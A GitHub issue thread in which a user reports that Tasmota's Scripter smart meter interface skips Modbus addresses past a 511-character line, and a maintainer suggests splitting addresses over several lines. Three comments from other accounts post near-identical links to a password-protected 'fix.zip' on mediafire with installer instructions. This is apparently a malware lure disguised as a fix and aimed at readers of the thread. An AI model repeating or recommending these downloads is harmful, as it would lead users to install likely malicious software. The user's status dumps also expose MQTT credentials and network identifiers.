arendst/Tasmota #22032: Scripter smart meter interface addresses limit of 511 chars.

RaphaelSquair, 2024-08-28:
### PROBLEM DESCRIPTION
I'm trying to read more than 70 adresses using modbus in the smart meter interface (sensor53). Still, after around 54 variables read the dump(sensor53 d1) in the console,  the behavior of the script is to skip to the first address again, i've noted that measuring the lenght of the line to the last address that work before the skip sums to 511 chars. I've found a post that said that rules were implemented in 511 chunks, so i think this is a limitation in the implementation of the scripter code in xdrv_10_scripter.ino. Still, i couldn't find a variable that define a memory allocation of this size.

Coud @gemu2015 , @ascillato2 , and @Jason2866  help me with this? i think it's just a case of resizing a buffer and recompiling my code.

### REQUESTED INFORMATION
_Make sure your have performed every step and checked the applicable boxes before submitting your issue. Thank you!_

- [ ] Read the [Contributing Guide and Policy](https://github.com/arendst/Tasmota/blob/development/CONTRIBUTING.md) and [the Code of Conduct](https://github.com/arendst/Tasmota/blob/development/CODE_OF_CONDUCT.md)
- [ ] Searched the problem in [issues](https://github.com/arendst/Tasmota/issues)
- [ ] Searched the problem in [discussions](https://github.com/arendst/Tasmota/discussions)
- [ ] Searched the problem in the [docs](https://tasmota.github.io/docs/FAQ)
- [ ] Searched the problem in the [chat](https://discord.gg/Ks2Kzd4)
- [ ] Device used (e.g., Sonoff Basic): Esp32
- [ ] Tasmota binary firmware version number used: 14.2
  - [ ] Pre-compiled
  - [ ] Self-compiled
- [ ] Flashing tools used: esptool
- [ ] Provide the output of command: `Backlog Template; Module; GPIO 255`:
```lua
  Configuration output here:
{"NAME":"ESP32-DevKit","GPIO":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,1,1,0,0,1],"FLAG":0,"BASE":1}

```
- [ ] Provide the output of this command: `00:07:57.524 MQT: DEFAULT/B0B21C4F5B1C/STATUS = {"Status":{"Module":1,"DeviceName":"BABEL","FriendlyName":["BABEL"],"Topic":"DEFAULT/B0B21C4F5B1C","ButtonTopic":"0","Power":"0","PowerLock":"0","PowerOnState":3,"LedState":5,"LedMask":"FFFF","SaveData":1,"SaveState":1,"SwitchTopic":"0","SwitchMode":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"ButtonRetain":0,"SwitchRetain":0,"SensorRetain":0,"PowerRetain":0,"InfoRetain":0,"StateRetain":0,"StatusRetain":0}}
00:07:57.565 MQT: DEFAULT/B0B21C4F5B1C/STATUS1 = {"StatusPRM":{"Baudrate":115200,"SerialConfig":"8N1","GroupTopic":"DEFAULT","OtaUrl":"http://squair-ota-version","RestartReason":"Vbat power on reset","Uptime":"0T01:31:47","StartupUTC":"2024-08-28T01:36:10","Sleep":50,"CfgHolder":4617,"BootCount":6,"BCResetTime":"2024-08-26T01:16:29","SaveCount":12}}
00:07:57.594 MQT: DEFAULT/B0B21C4F5B1C/STATUS2 = {"StatusFWR":{"Version":"14.2.0(tasmota32)","BuildDateTime":"2024-08-25T20:24:25","Core":"3_0_4","SDK":"5.1.4.240801","CpuFrequency":160,"Hardware":"ESP32-D0WDQ6-V3 v3.0","CR":"423/699"}}
00:07:57.621 MQT: DEFAULT/B0B21C4F5B1C/STATUS3 = {"StatusLOG":{"SerialLog":0,"WebLog":2,"MqttLog":0,"SysLog":0,"LogHost":"","LogPort":514,"SSId":["IOT_Squair2","IOT_Squair"],"TelePeriod":300,"Resolution":"558180C0","SetOption":["0000200B","2805C80000000600003C5A0A192800000000","000080C8","00006000","00006000","00000002"]}}
00:07:57.658 MQT: DEFAULT/B0B21C4F5B1C/STATUS4 = {"StatusMEM":{"ProgramSize":1979,"Free":900,"Heap":124,"StackLowMark":3,"PsrMax":0,"PsrFree":0,"ProgramFlashSize":4096,"FlashSize":4096,"FlashChipId":"1640EF","FlashFrequency":80,"FlashMode":"DIO","Features":["0809","958A15DF","0009A001","B7F7BFCF","05DA9BC4","20360C4F","480840D2","20200000","84BC482D","810A80B1","00000014"],"Drivers":"1,2,!3,!4,!5,!8,9,10,11,12,!14,!16,!17,!24,29,!34,38,50,52,!59,!60,62,!63,!66,!67,!68,!73,82,!86,!87,!88,!121","Sensors":"1,2,3,5,6,7,8,9,10,11,12,13,14,15,17,18,19,20,21,22,26,31,34,37,39,40,42,43,45,51,52,53,55,56,58,59,64,66,67,74,85,92,95,98,103,105,109,127","I2CDriver":"7,8,9,10,11,12,13,14,15,17,18,20,24,29,31,36,41,42,44,46,48,58,62,65,69,76,77,82"}}
00:07:57.731 MQT: DEFAULT/B0B21C4F5B1C/STATUS5 = {"StatusNET":{"Hostname":"DEFAULT-B0B21C4F5B1C-SQUAIR","IPAddress":"192.168.1.29","Gateway":"192.168.1.1","Subnetmask":"255.255.255.0","DNSServer1":"192.168.1.1","DNSServer2":"0.0.0.0","Mac":"B0:B2:1C:4F:5B:1C","IP6Global":"","IP6Local":"fe80::b2b2:1cff:fe4f:5b1c%st2","Ethernet":{"Hostname":"","IPAddress":"0.0.0.0","Gateway":"0.0.0.0","Subnetmask":"0.0.0.0","DNSServer1":"192.168.1.1","DNSServer2":"0.0.0.0","Mac":"00:00:00:00:00:00","IP6Global":"","IP6Local":""},"Webserver":2,"HTTP_API":1,"WifiConfig":4,"WifiPower":16.0}}
00:07:57.784 MQT: DEFAULT/B0B21C4F5B1C/STATUS6 = {"StatusMQT":{"MqttHost":"driver.cloudmqtt.com","MqttPort":18797,"MqttClientMask":"Babel_%12X","MqttClient":"Babel_B0B21C4F5B1C","MqttUser":"iwmlgcbw","MqttCount":1,"MAX_PACKET_SIZE":1200,"KEEPALIVE":15,"SOCKET_TIMEOUT":10}}
00:07:57.811 MQT: DEFAULT/B0B21C4F5B1C/STATUS7 = {"StatusTIM":{"UTC":"2024-08-28T03:07:57Z","Local":"2024-08-28T00:07:57","StartDST":"2024-03-31T02:00:00","EndDST":"2024-10-27T03:00:00","Timezone":"-03:00"}}
00:07:57.829 MQT: DEFAULT/B0B21C4F5B1C/STATUS10 = {"StatusSNS":{"Time":"2024-08-28T00:07:57","MAC":"B0:B2:1C:4F:5B:1C","BOOTCOUNT":6,"SIGNAL":-54,"HEAP":130,"UPSEC":5497,"DEVICE":"ME238_TRIPLE","VERSION":"0.0.2-stable","CLIENT":"","FILIAL":"","AREA":","QNT":2"}}
00:07:57.859 MQT: DEFAULT/B0B21C4F5B1C/STATUS11 = {"StatusSTS":{"Time":"2024-08-28T00:07:57","Uptime":"0T01:31:47","UptimeSec":5507,"Heap":122,"SleepMode":"Dynamic","Sleep":50,"LoadAvg":99,"MqttCount":1,"Berry":{"HeapUsed":3,"Objects":41},"Wifi":{"AP":2,"SSId":"IOT_Squair","BSSId":"B2:7F:B9:1D:95:38","Channel":2,"Mode":"HT40","RSSI":92,"Signal":-54,"LinkCount":1,"Downtime":"0T00:00:12"}}}
`:
```lua
  STATUS 0 output here:

```
- [ ] Set `weblog` to 4 and then, when you experience your issue, provide the output of the Console log:
```lua
  Console output here:
after applying the command sensor53 d1 the folloing happens 
23:58:01.634 > 02 03 07 dc 00 02 04 b6 
23:58:01.736 > 02 03 0f a6 00 02 27 0f 
23:58:01.836 > 02 03 0f ae 00 02 a6 cd 
23:58:01.938 > 02 03 0f be 00 02 a7 08 
23:58:02.037 > 02 03 0f c6 00 02 27 11 
23:58:02.136 > 03 03 03 e8 00 02 45 99 
23:58:02.236 > 03 03 03 ea 00 02 e4 59    <--- this one is the last requested address that works. after this 
23:58:02.336 > 00 02 80 71                       <--- After that, this happens like it was accessing an illegal address 
23:58:02.436 > 01 03 03 e8 00 02 44 7b    <---And it restart to the first address requested.

```

### TO REPRODUCE
use more than 511 chars in the line of the meter definition and the address after the 512 char will not be sent.

### EXPECTED BEHAVIOUR
the buffer of addresses should work with an unlimited number of addresses of course maintaining within the limitations of memory.
A suggestion, I know that the addresses should stay in one line, but if it were possible to spread the addresses through multiple lines the problem would be more manageable.

### SCREENSHOTS
_If applicable, add screenshots to help explain your problem._

### ADDITIONAL CONTEXT
_Add any other context about the problem here._

**(Please, remember to close the issue when the problem has been addressed)**

Superstar-IT, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Noschvie, 2024-08-28:
What's that!?

gemu2015, 2024-08-28:
simply spread addresses over more lines (is supported)
or read multiple values per address which is much faster (see examples in the docs)

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."